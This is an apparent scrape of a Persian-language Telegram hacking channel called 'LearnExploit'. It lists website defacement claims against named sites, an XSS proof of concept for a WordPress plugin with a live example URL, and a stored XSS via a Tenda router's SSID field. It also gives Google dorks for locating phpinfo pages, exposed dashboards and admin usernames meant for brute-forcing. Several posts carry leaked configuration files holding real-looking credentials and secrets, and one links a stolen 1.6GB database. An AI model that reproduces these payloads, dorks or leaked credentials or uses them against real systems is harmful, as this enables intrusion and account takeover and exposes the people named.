#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640604
http://barplot.eterrasystems.eu/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640604
http://barplot.eterrasystems.eu/
—
@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640655
http://bioleed.eterrasystems.eu/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640655
http://bioleed.eterrasystems.eu/
—
@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640656
http://magento.eterrasystems.eu/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640656
http://magento.eterrasystems.eu/
—
@LearnExploit
#DeFaced By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640658
http://prestashop.eterrasystems.eu/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640658
http://prestashop.eterrasystems.eu/
—
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640696
http://www.dentalsupply.co.cr/
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31640696
http://www.dentalsupply.co.cr/
—
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1699092/
http://twawezacommunications.org/home.php
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://mirror-h.org/zone/1699092/
http://twawezacommunications.org/home.php
—
@LearnExploit
#Hacked By #X0P4SH4
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31641341
http://fcrsny.org/index.html
—
@LearnExploit
[+] X0P4SH4 - UZIHACKER - EVILBOY - T.H.C TEAM - R4DIKALL [+]
https://zone-h.org/mirror/id/31641341
http://fcrsny.org/index.html
—
@LearnExploit
#`Exploit Title` :
/————start :
#`Google Dork` :
#`Description` :
این اسیب پذیری در بخش view.php سایت میباشید و هرچیزی که بعد از view.php بیاید برای شما در سایت نمایش میدهد.
#`Poc` :
با روش زیر اکسپلویت رو انجام بدید :
view.php?pdf=<html><h1>Hacked by X0P4SH4</h1>
#`Example` :
———————
T.mE/LeaRNEXploIT
Wordpress Plugins flipbox Cross Site Scripting (XSS)
/————start :
#`Google Dork` :
inurl:/wp-content/plugins/flipbox
#`Description` :
این اسیب پذیری در بخش view.php سایت میباشید و هرچیزی که بعد از view.php بیاید برای شما در سایت نمایش میدهد.
#`Poc` :
با روش زیر اکسپلویت رو انجام بدید :
view.php?pdf=<html><h1>Hacked by X0P4SH4</h1>
#`Example` :
https://www.rendezvous-carnetdevoyage.com/wp-content/plugins/flipbox/view.php?pdf=%3Chtml%3E%3Ch1%3EHacked%20by%20X0P4SH4%3C/h1%3E
———————
T.mE/LeaRNEXploIT
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#Dork - #Find #PHPINFO
======================
Dork :
intext:"PHP Version " ext:php intext:"disabled" intext:"Build Date" intext:"System" intext:"allow_url_fopen"
——
Example :
http://veconlab.econ.virginia.edu/phpinfo.php
======================
@LearnExploit
======================
Dork :
intext:"PHP Version " ext:php intext:"disabled" intext:"Build Date" intext:"System" intext:"allow_url_fopen"
——
Example :
http://veconlab.econ.virginia.edu/phpinfo.php
======================
@LearnExploit
Forwarded from اتچ بات
#Dork - #Find #Publice #Servers
/————-/
[+]Dork:
intext:"Build dashboard" intext:"Project" intext:"Plan" intext:"Build"
—————
[+]Info:
با این دورک شما میتونید سرور های پابلیک مثل dashboard رو پیدا کنید.
همچنین این دورک به شما کمک میکند که فایل های مهمی مانند Log.txt هم دسترسی داشته باشید.
————-
[+]Example:
https://messir.uni.lu/bamboo/deploy/viewDeploymentResult.action?deploymentResultId=46170129
/—————/
T.me/LearnExploit
/————-/
[+]Dork:
intext:"Build dashboard" intext:"Project" intext:"Plan" intext:"Build"
—————
[+]Info:
با این دورک شما میتونید سرور های پابلیک مثل dashboard رو پیدا کنید.
همچنین این دورک به شما کمک میکند که فایل های مهمی مانند Log.txt هم دسترسی داشته باشید.
————-
[+]Example:
https://messir.uni.lu/bamboo/deploy/viewDeploymentResult.action?deploymentResultId=46170129
/—————/
T.me/LearnExploit
Telegram
:::: #AppConfig - #Github - #GitLab ::::
——————————————————
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
</startup>
<appSettings>
<add key="URL" value="https://hclo365.sharepoint.com/sites/Academy/ING" />
<add key="AcademyConfig" value="AcademyConfig" />
<add key="AcademyMember" value="ING Visitors" />
<add key="UserName" value="Sudipta_b@hcl.com" />
<add key="EncryptKey" value="123"/>
<add key="Password" value="fWSqCZ2WdCbDBbY9gSPuadIY3pPhgzfCQGRQwZUdeZU=" />
<add key="ClientSettingsProvider.ServiceUri" value="" />
</appSettings>
<system.web>
<membership defaultProvider="ClientAuthenticationMembershipProvider">
<providers>
<add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />
</providers>
</membership>
<roleManager defaultProvider="ClientRoleProvider" enabled="true">
<providers>
<add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86400" />
</providers>
</roleManager>
</system.web>
</configuration>
——————————————
فک نکنم دیگه نیاز به توضیح باشه...
=== > @LearnExploit
——————————————————
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />
</startup>
<appSettings>
<add key="URL" value="https://hclo365.sharepoint.com/sites/Academy/ING" />
<add key="AcademyConfig" value="AcademyConfig" />
<add key="AcademyMember" value="ING Visitors" />
<add key="UserName" value="Sudipta_b@hcl.com" />
<add key="EncryptKey" value="123"/>
<add key="Password" value="fWSqCZ2WdCbDBbY9gSPuadIY3pPhgzfCQGRQwZUdeZU=" />
<add key="ClientSettingsProvider.ServiceUri" value="" />
</appSettings>
<system.web>
<membership defaultProvider="ClientAuthenticationMembershipProvider">
<providers>
<add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />
</providers>
</membership>
<roleManager defaultProvider="ClientRoleProvider" enabled="true">
<providers>
<add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86400" />
</providers>
</roleManager>
</system.web>
</configuration>
——————————————
فک نکنم دیگه نیاز به توضیح باشه...
=== > @LearnExploit
:::: #AppConfig - #Github - #GitLab ::::
Fiti.app -[
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<connectionStrings>
<add name="AutoScoutDB" providerName="System.Data.SqlClient"
connectionString="user id=marc;password=marc;server=10.176.129.40;Integrated Security=no;database=eCommerce;connection timeout=30" />
</connectionStrings>
</configuration>
]-
t.me/learnexploit
------------------
Fiti.app -[
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<connectionStrings>
<add name="AutoScoutDB" providerName="System.Data.SqlClient"
connectionString="user id=marc;password=marc;server=10.176.129.40;Integrated Security=no;database=eCommerce;connection timeout=30" />
</connectionStrings>
</configuration>
]-
===========
t.me/learnexploit
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
سایت hackertest.net
یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش
هر روز 3 مرحله رو با هم میریم
@soheileast
==========
Channel = @LearnExploit
یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش
هر روز 3 مرحله رو با هم میریم
@soheileast
==========
Channel = @LearnExploit
0Day.Today | Learn Exploit | Zero World | Dark web |
سایت hackertest.net یک سایت هست برای تست توانایی هکر ها دارای 20 مرحله هستش هر روز 3 مرحله رو با هم میریم @soheileast ========== Channel = @LearnExploit
#Pentesting - #Part 1 - #hackertest_Net
—————————————————
سلام دوستان این بخش نیاز به رکورد فیلم نداشت و این بخش رو توضیح میدم.
مراحل :
1)
وارد سورس پیج شید
== >
اگر با اندروید هستید متن زیر رو پشت Url سایت قرار دهید .
view-source:
به سورت زیر :
view-source:http://www.hackertest.net/
<==
2 )
بخش زیر رو در صفحه پیدا کنید :
}
}
بعدش میاد میگه که اگر از کل صفحه مقدار برار a ینی همون null بود کد زیر رو برامون اجرا کن :
——————————-
T.me/LearnExploit
0Day.Today Boy's
—————————————————
سلام دوستان این بخش نیاز به رکورد فیلم نداشت و این بخش رو توضیح میدم.
مراحل :
1)
وارد سورس پیج شید
== >
اگر با اندروید هستید متن زیر رو پشت Url سایت قرار دهید .
view-source:
به سورت زیر :
view-source:http://www.hackertest.net/
<==
2 )
بخش زیر رو در صفحه پیدا کنید :
<script language=JavaScript>
{var a="null";
function check()
{if (document.a.c.value == a)
{document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
}else
{alert ("Try again");
}}
}
</script>
در اسکریپ بالا اپدا یک متغییر تعریف میکنه و مقدار null رو به اون میده بعدش میاد میگه که اگر از کل صفحه مقدار برار a ینی همون null بود کد زیر رو برامون اجرا کن :
document.location.href="http://www.hackertest.net/"+document.a.c.value+".htm";
تو این کد به ما میگه که اگر مقدار درست بود مارو به صفحه ی document.a.c.value = a or null
http://www.hackertest.net/null.htm
هدایت کن——————————-
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Forwarded from اتچ بات
#Pentesting - #Part 2 - #hackertest_Net
————————-
سلام خدمت دوستان
قسمت دوم اموزش
hackertest
نیز اماده شد.
توضیحات کامل در داخل فیلم گفته شده
فقط تنها نکته ای باید توجه کنیداینه که :
پسورد
131
نیست
بلکه
l3l
هست.
—————————
T.me/LeranExploit
0Day.Today Boy's
————————-
سلام خدمت دوستان
قسمت دوم اموزش
hackertest
نیز اماده شد.
توضیحات کامل در داخل فیلم گفته شده
فقط تنها نکته ای باید توجه کنیداینه که :
پسورد
131
نیست
بلکه
l3l
هست.
—————————
T.me/LeranExploit
0Day.Today Boy's
Telegram
#Target #wp #Database
——————————
Target :
Database :
file size : 1.6G
——————————-
T.me/LearnExploit
——————————
Target :
https://www.carisma.net/
\-------------\
Database :
yon.ir/SPRfx
\-------------\
file size : 1.6G
——————————-
T.me/LearnExploit
Forwarded from اتچ بات
Telegram
#Xss #Bug In #Router (Tenda D152 ADSL Router)
و اینبار اسیب پذیری xss در روتر tenda :
برای مشاهده ی این اسیب پذیری وارد روتر
(Wifi Router Gateway)
خود شید :
http://Target/login
——
سپس به مسیر زیر برید :
بعد SSID رو به
تغییر بدید و پیج رو رفرش کنید :)
پاپ اپ LearnExploit قابل رویت است برای شما...
————————
T.me/LearnExploit
0Day.Today Boy's
و اینبار اسیب پذیری xss در روتر tenda :
برای مشاهده ی این اسیب پذیری وارد روتر
(Wifi Router Gateway)
خود شید :
http://Target/login
——
سپس به مسیر زیر برید :
General Setup
--> Wireless
--> Basic Settings
بعد SSID رو به
<script>alert("LearnExploit")</script>
تغییر بدید و پیج رو رفرش کنید :)
پاپ اپ LearnExploit قابل رویت است برای شما...
————————
T.me/LearnExploit
0Day.Today Boy's
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#Dork | Get Username admin site or forums...
————————-
#Dork :
|Descriptions : |
دوستان این دورک user ادمین سایت رو میده
و شما میتونید از ان برای bruteforce استفاده کنید تا پسورد سایت رو بدست بیارید.
—————————
#GHDB
@LearnExploit
————————-
#Dork :
inurl:/profile.php?lookup=1
|Descriptions : |
دوستان این دورک user ادمین سایت رو میده
و شما میتونید از ان برای bruteforce استفاده کنید تا پسورد سایت رو بدست بیارید.
—————————
#GHDB
@LearnExploit
#Datbase #User #Passwd
============================
parameters:
database_driver: pdo_mysql
database_host: 127.0.0.1
database_port: null
database_name: basededattos
database_user: ruben
database_password: calipo123
mailer_transport: smtp
mailer_host: rubenpeib@gmail.com
mailer_user: null
mailer_password: null
locale: en
secret: 94f06f449a955c057befc3043d374fc9c0b21329
database_path: null
==============================
=== > see : http://159.149.130.120/ruben/app/config
============================================
@LearnExploit
============================
parameters:
database_driver: pdo_mysql
database_host: 127.0.0.1
database_port: null
database_name: basededattos
database_user: ruben
database_password: calipo123
mailer_transport: smtp
mailer_host: rubenpeib@gmail.com
mailer_user: null
mailer_password: null
locale: en
secret: 94f06f449a955c057befc3043d374fc9c0b21329
database_path: null
==============================
=== > see : http://159.149.130.120/ruben/app/config
============================================
@LearnExploit